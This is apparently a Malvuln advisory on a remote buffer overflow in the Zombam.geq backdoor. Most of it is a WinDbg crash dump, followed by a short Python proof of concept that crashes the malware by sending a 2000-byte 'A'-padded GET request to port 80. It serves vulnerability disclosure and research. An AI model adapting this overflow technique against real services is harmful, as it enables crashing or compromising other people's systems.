Backdoor.Win32.Zombam.geq malware suffers from a remote buffer overflow vulnerability.
0e05a63a804977c46a87862508e94e15
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/fd14cc7f025f49a3e08b4169d44a774e.txt
Contact: [email protected]
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Zombam.geq
Vulnerability: Remote Buffer Overflow
Description: Zombam.geq listens for connections on TCP port 80 and trys connect to SMTP port 25. By sending a HTTP GET request of about 2000 bytes triggers buffer overflow corrupting the stack and overwriting EDX register.
Type: PE32
MD5: fd14cc7f025f49a3e08b4169d44a774e
Vuln ID: MVID-2021-0037
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/19/2021
Memory Dump:
(19a0.17cc): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=048ffa24 edx=41414141 esi=00000003 edi=00000003
eip=773ced3c esp=048ff0bc ebp=048ff24c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
ntdll!ZwWaitForMultipleObjects+0xc:
773ced3c c21400 ret 14h
0:004> .ecxr
eax=048ff9f4 ebx=040202d0 ecx=048ffa24 edx=41414141 esi=040202d0 edi=00404626
eip=004024f8 esp=048ff9dc ebp=048ffa2c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
*** WARNING: Unable to verify checksum for Backdoor.Win32.Zombam.geq.fd14cc7f025f49a3e08b4169d44a774e.exe
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Zombam.geq.fd14cc7f025f49a3e08b4169d44a774e.exe
Backdoor_Win32_Zombam_geq_fd14cc7f025f49a3e08b4169d44a774e+0x24f8:
004024f8 8b4204 mov eax,dword ptr [edx+4] ds:002b:41414145=????????
0:004> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
FAULTING_IP:
Backdoor_Win32_Zombam_geq_fd14cc7f025f49a3e08b4169d44a774e+24f8
004024f8 8b4204 mov eax,dword ptr [edx+4]
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 004024f8 (Backdoor_Win32_Zombam_geq_fd14cc7f025f49a3e08b4169d44a774e+0x000024f8)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 41414145
Attempt to read from address 41414145
PROCESS_NAME: Backdoor.Win32.Zombam.geq.fd14cc7f025f49a3e08b4169d44a774e.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: 41414145
READ_ADDRESS: 41414145
FOLLOWUP_IP:
Backdoor_Win32_Zombam_geq_fd14cc7f025f49a3e08b4169d44a774e+24f8
004024f8 8b4204 mov eax,dword ptr [edx+4]
MOD_LIST: <ANALYSIS/>
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
FAULTING_THREAD: 000017cc
BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141
DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141
LAST_CONTROL_TRANSFER: from 004020ac to 004024f8
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
048ffa2c 004020ac 41414141 048ffa40 00000415 Backdoor_Win32_Zombam_geq_fd14cc7f025f49a3e08b4169d44a774e+0x24f8
048ffaa4 41414141 41414141 41414141 41414141 Backdoor_Win32_Zombam_geq_fd14cc7f025f49a3e08b4169d44a774e+0x20ac
048ffaa8 41414141 41414141 41414141 41414141 0x41414141
048ffaac 41414141 41414141 41414141 41414141 0x41414141
048ffab0 41414141 41414141 41414141 41414141 0x41414141
048ffab4 41414141 41414141 41414141 41414141 0x41414141
048ffab8 41414141 41414141 41414141 41414141 0x41414141
048ffabc 41414141 41414141 41414141 41414141 0x41414141
048ffac0 41414141 41414141 41414141 41414141 0x41414141
048ffac4 41414141 41414141 41414141 41414141 0x41414141
048ffac8 41414141 41414141 41414141 41414141 0x41414141
048ffacc 41414141 41414141 41414141 41414141 0x41414141
048ffad0 41414141 41414141 41414141 41414141 0x41414141
048ffad4 41414141 41414141 41414141 41414141 0x41414141
048ffad8 41414141 41414141 41414141 41414141 0x41414141
048ffadc 41414141 41414141 41414141 41414141 0x41414141
048ffae0 41414141 41414141 41414141 41414141 0x41414141
048ffae4 41414141 41414141 41414141 41414141 0x41414141
048ffae8 41414141 41414141 41414141 41414141 0x41414141
048ffaec 41414141 41414141 41414141 41414141 0x41414141
048ffaf0 41414141 41414141 41414141 41414141 0x41414141
048ffaf4 41414141 41414141 41414141 41414141 0x41414141
048ffaf8 41414141 41414141 41414141 41414141 0x41414141
048ffafc 41414141 41414141 41414141 41414141 0x41414141
048ffb00 41414141 41414141 41414141 41414141 0x41414141
048ffb04 41414141 41414141 41414141 41414141 0x41414141
048ffb08 41414141 41414141 41414141 41414141 0x41414141
048ffb0c 41414141 41414141 41414141 41414141 0x41414141
048ffb10 41414141 41414141 41414141 41414141 0x41414141
048ffb14 41414141 41414141 41414141 41414141 0x41414141
048ffb18 41414141 41414141 41414141 41414141 0x41414141
048ffb1c 41414141 41414141 41414141 41414141 0x41414141
048ffb20 41414141 41414141 41414141 41414141 0x41414141
048ffb24 41414141 41414141 41414141 41414141 0x41414141
048ffb28 41414141 41414141 41414141 41414141 0x41414141
048ffb2c 41414141 41414141 41414141 41414141 0x41414141
048ffb30 41414141 41414141 41414141 41414141 0x41414141
048ffb34 41414141 41414141 41414141 41414141 0x41414141
048ffb38 41414141 41414141 41414141 41414141 0x41414141
048ffb3c 41414141 41414141 41414141 41414141 0x41414141
048ffb40 41414141 41414141 41414141 41414141 0x41414141
048ffb44 41414141 41414141 41414141 41414141 0x41414141
048ffb48 41414141 41414141 41414141 41414141 0x41414141
048ffb4c 41414141 41414141 41414141 41414141 0x41414141
048ffb50 41414141 41414141 41414141 41414141 0x41414141
048ffb54 41414141 41414141 41414141 41414141 0x41414141
048ffb58 41414141 41414141 41414141 41414141 0x41414141
048ffb5c 41414141 41414141 41414141 41414141 0x41414141
048ffb60 41414141 41414141 41414141 41414141 0x41414141
048ffb64 41414141 41414141 41414141 41414141 0x41414141
048ffb68 41414141 41414141 41414141 41414141 0x41414141
048ffb6c 41414141 41414141 41414141 41414141 0x41414141
048ffb70 41414141 41414141 41414141 41414141 0x41414141
048ffb74 41414141 41414141 41414141 41414141 0x41414141
048ffb78 41414141 41414141 41414141 41414141 0x41414141
048ffb7c 41414141 41414141 41414141 41414141 0x41414141
048ffb80 41414141 41414141 41414141 41414141 0x41414141
048ffb84 41414141 41414141 41414141 41414141 0x41414141
048ffb88 41414141 41414141 41414141 41414141 0x41414141
048ffb8c 41414141 41414141 41414141 41414141 0x41414141
048ffb90 41414141 41414141 41414141 41414141 0x41414141
048ffb94 41414141 41414141 41414141 41414141 0x41414141
048ffb98 41414141 41414141 41414141 41414141 0x41414141
048ffb9c 41414141 41414141 41414141 41414141 0x41414141
048ffba0 41414141 41414141 41414141 41414141 0x41414141
048ffba4 41414141 41414141 41414141 41414141 0x41414141
048ffba8 41414141 41414141 41414141 41414141 0x41414141
048ffbac 41414141 41414141 41414141 41414141 0x41414141
048ffbb0 41414141 41414141 41414141 41414141 0x41414141
048ffbb4 41414141 41414141 41414141 41414141 0x41414141
048ffbb8 41414141 41414141 41414141 41414141 0x41414141
048ffbbc 41414141 41414141 41414141 41414141 0x41414141
048ffbc0 41414141 41414141 41414141 41414141 0x41414141
048ffbc4 41414141 41414141 41414141 41414141 0x41414141
048ffbc8 41414141 41414141 41414141 41414141 0x41414141
048ffbcc 41414141 41414141 41414141 41414141 0x41414141
048ffbd0 41414141 41414141 41414141 41414141 0x41414141
048ffbd4 41414141 41414141 41414141 41414141 0x41414141
048ffbd8 41414141 41414141 41414141 41414141 0x41414141
048ffbdc 41414141 41414141 41414141 41414141 0x41414141
048ffbe0 41414141 41414141 41414141 41414141 0x41414141
048ffbe4 41414141 41414141 41414141 41414141 0x41414141
048ffbe8 41414141 41414141 41414141 41414141 0x41414141
048ffbec 41414141 41414141 41414141 41414141 0x41414141
048ffbf0 41414141 41414141 41414141 41414141 0x41414141
048ffbf4 41414141 41414141 41414141 41414141 0x41414141
048ffbf8 41414141 41414141 41414141 41414141 0x41414141
048ffbfc 41414141 41414141 41414141 41414141 0x41414141
048ffc00 41414141 41414141 41414141 41414141 0x41414141
048ffc04 41414141 41414141 41414141 41414141 0x41414141
048ffc08 41414141 41414141 41414141 41414141 0x41414141
048ffc0c 41414141 41414141 41414141 41414141 0x41414141
048ffc10 41414141 41414141 41414141 41414141 0x41414141
048ffc14 41414141 41414141 41414141 41414141 0x41414141
048ffc18 41414141 41414141 41414141 41414141 0x41414141
048ffc1c 41414141 41414141 41414141 41414141 0x41414141
048ffc20 41414141 41414141 41414141 41414141 0x41414141
048ffc24 41414141 41414141 41414141 41414141 0x41414141
048ffc28 41414141 41414141 41414141 41414141 0x41414141
048ffc2c 41414141 41414141 41414141 41414141 0x41414141
048ffc30 41414141 41414141 41414141 41414141 0x41414141
048ffc34 41414141 41414141 41414141 41414141 0x41414141
048ffc38 41414141 41414141 41414141 41414141 0x41414141
048ffc3c 41414141 41414141 41414141 41414141 0x41414141
048ffc40 41414141 41414141 41414141 41414141 0x41414141
048ffc44 41414141 41414141 41414141 41414141 0x41414141
048ffc48 41414141 41414141 41414141 41414141 0x41414141
048ffc4c 41414141 41414141 41414141 41414141 0x41414141
048ffc50 41414141 41414141 41414141 41414141 0x41414141
048ffc54 41414141 41414141 41414141 41414141 0x41414141
048ffc58 41414141 41414141 41414141 41414141 0x41414141
048ffc5c 41414141 41414141 41414141 41414141 0x41414141
048ffc60 41414141 41414141 41414141 41414141 0x41414141
048ffc64 41414141 41414141 41414141 41414141 0x41414141
048ffc68 41414141 41414141 41414141 41414141 0x41414141
048ffc6c 41414141 41414141 41414141 41414141 0x41414141
048ffc70 41414141 41414141 41414141 41414141 0x41414141
048ffc74 41414141 41414141 41414141 41414141 0x41414141
048ffc78 41414141 41414141 41414141 41414141 0x41414141
048ffc7c 41414141 41414141 41414141 41414141 0x41414141
048ffc80 41414141 41414141 41414141 41414141 0x41414141
048ffc84 41414141 41414141 41414141 41414141 0x41414141
048ffc88 41414141 41414141 41414141 41414141 0x41414141
048ffc8c 41414141 41414141 41414141 41414141 0x41414141
048ffc90 41414141 41414141 41414141 41414141 0x41414141
048ffc94 41414141 41414141 41414141 41414141 0x41414141
048ffc98 41414141 41414141 41414141 41414141 0x41414141
048ffc9c 41414141 41414141 41414141 41414141 0x41414141
048ffca0 41414141 41414141 41414141 41414141 0x41414141
048ffca4 41414141 41414141 41414141 41414141 0x41414141
048ffca8 41414141 41414141 41414141 41414141 0x41414141
048ffcac 41414141 41414141 41414141 41414141 0x41414141
048ffcb0 41414141 41414141 41414141 41414141 0x41414141
048ffcb4 41414141 41414141 41414141 41414141 0x41414141
048ffcb8 41414141 41414141 41414141 41414141 0x41414141
048ffcbc 41414141 41414141 41414141 41414141 0x41414141
048ffcc0 41414141 41414141 41414141 41414141 0x41414141
048ffcc4 41414141 41414141 41414141 41414141 0x41414141
048ffcc8 41414141 41414141 41414141 41414141 0x41414141
048ffccc 41414141 41414141 41414141 41414141 0x41414141
048ffcd0 41414141 41414141 41414141 41414141 0x41414141
048ffcd4 41414141 41414141 41414141 41414141 0x41414141
048ffcd8 41414141 41414141 41414141 41414141 0x41414141
048ffcdc 41414141 41414141 41414141 41414141 0x41414141
048ffce0 41414141 41414141 41414141 41414141 0x41414141
048ffce4 41414141 41414141 41414141 41414141 0x41414141
048ffce8 41414141 41414141 41414141 41414141 0x41414141
048ffcec 41414141 41414141 41414141 41414141 0x41414141
048ffcf0 41414141 41414141 41414141 41414141 0x41414141
048ffcf4 41414141 41414141 41414141 41414141 0x41414141
048ffcf8 41414141 41414141 41414141 41414141 0x41414141
048ffcfc 41414141 41414141 41414141 41414141 0x41414141
048ffd00 41414141 41414141 41414141 41414141 0x41414141
048ffd04 41414141 41414141 41414141 41414141 0x41414141
048ffd08 41414141 41414141 41414141 41414141 0x41414141
048ffd0c 41414141 41414141 41414141 41414141 0x41414141
048ffd10 41414141 41414141 41414141 41414141 0x41414141
048ffd14 41414141 41414141 41414141 41414141 0x41414141
048ffd18 41414141 41414141 41414141 41414141 0x41414141
048ffd1c 41414141 41414141 41414141 41414141 0x41414141
048ffd20 41414141 41414141 41414141 41414141 0x41414141
048ffd24 41414141 41414141 41414141 41414141 0x41414141
048ffd28 41414141 41414141 41414141 41414141 0x41414141
048ffd2c 41414141 41414141 41414141 41414141 0x41414141
048ffd30 41414141 41414141 41414141 41414141 0x41414141
048ffd34 41414141 41414141 41414141 41414141 0x41414141
048ffd38 41414141 41414141 41414141 41414141 0x41414141
048ffd3c 41414141 41414141 41414141 41414141 0x41414141
048ffd40 41414141 41414141 41414141 41414141 0x41414141
048ffd44 41414141 41414141 41414141 41414141 0x41414141
048ffd48 41414141 41414141 41414141 41414141 0x41414141
048ffd4c 41414141 41414141 41414141 41414141 0x41414141
048ffd50 41414141 41414141 41414141 41414141 0x41414141
048ffd54 41414141 41414141 41414141 41414141 0x41414141
048ffd58 41414141 41414141 41414141 41414141 0x41414141
048ffd5c 41414141 41414141 41414141 41414141 0x41414141
048ffd60 41414141 41414141 41414141 41414141 0x41414141
048ffd64 41414141 41414141 41414141 41414141 0x41414141
048ffd68 41414141 41414141 41414141 41414141 0x41414141
048ffd6c 41414141 41414141 41414141 41414141 0x41414141
048ffd70 41414141 41414141 41414141 41414141 0x41414141
048ffd74 41414141 41414141 41414141 41414141 0x41414141
048ffd78 41414141 41414141 41414141 41414141 0x41414141
048ffd7c 41414141 41414141 41414141 41414141 0x41414141
048ffd80 41414141 41414141 41414141 41414141 0x41414141
048ffd84 41414141 41414141 41414141 41414141 0x41414141
048ffd88 41414141 41414141 41414141 41414141 0x41414141
048ffd8c 41414141 41414141 41414141 41414141 0x41414141
048ffd90 41414141 41414141 41414141 41414141 0x41414141
048ffd94 41414141 41414141 41414141 41414141 0x41414141
048ffd98 41414141 41414141 41414141 41414141 0x41414141
048ffd9c 41414141 41414141 41414141 41414141 0x41414141
048ffda0 41414141 41414141 41414141 41414141 0x41414141
048ffda4 41414141 41414141 41414141 41414141 0x41414141
048ffda8 41414141 41414141 41414141 41414141 0x41414141
048ffdac 41414141 41414141 41414141 41414141 0x41414141
048ffdb0 41414141 41414141 41414141 41414141 0x41414141
048ffdb4 41414141 41414141 41414141 41414141 0x41414141
048ffdb8 41414141 41414141 41414141 41414141 0x41414141
048ffdbc 41414141 41414141 41414141 41414141 0x41414141
048ffdc0 41414141 41414141 41414141 41414141 0x41414141
048ffdc4 41414141 41414141 41414141 41414141 0x41414141
048ffdc8 41414141 41414141 41414141 41414141 0x41414141
048ffdcc 41414141 41414141 41414141 41414141 0x41414141
048ffdd0 41414141 41414141 41414141 41414141 0x41414141
048ffdd4 41414141 41414141 41414141 41414141 0x41414141
048ffdd8 41414141 41414141 41414141 41414141 0x41414141
048ffddc 41414141 41414141 41414141 41414141 0x41414141
048ffde0 41414141 41414141 41414141 41414141 0x41414141
048ffde4 41414141 41414141 41414141 41414141 0x41414141
048ffde8 41414141 41414141 41414141 41414141 0x41414141
048ffdec 41414141 41414141 41414141 41414141 0x41414141
048ffdf0 41414141 41414141 41414141 41414141 0x41414141
048ffdf4 41414141 41414141 41414141 41414141 0x41414141
048ffdf8 41414141 41414141 41414141 41414141 0x41414141
048ffdfc 41414141 41414141 41414141 41414141 0x4
STACK_COMMAND: ~4s; .ecxr ; kb
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: Backdoor_Win32_Zombam_geq_fd14cc7f025f49a3e08b4169d44a774e+24f8
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: Backdoor_Win32_Zombam_geq_fd14cc7f025f49a3e08b4169d44a774e
IMAGE_NAME: Backdoor.Win32.Zombam.geq.fd14cc7f025f49a3e08b4169d44a774e.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 3e8a96ba
FAILURE_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Zombam.geq.fd14cc7f025f49a3e08b4169d44a774e.exe!Unknown
BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_Backdoor_Win32_Zombam_geq_fd14cc7f025f49a3e08b4169d44a774e+24f8
Exploit/PoC:
from socket import *
MALWARE_HOST="x.x.x.x"
PORT=80
def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
PACKET="GET /"+"A"*2000+"HTTP/1.1\r\nHost: "+MALWARE_HOST+"\r\n\r\n"
s.send(PACKET)
s.close()
print("Backdoor.Win32.Zombam.geq / Remote Buffer Overflow");
print("MD5: fd14cc7f025f49a3e08b4169d44a774e");
print("By Malvuln");
if __name__=="__main__":
doit()
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).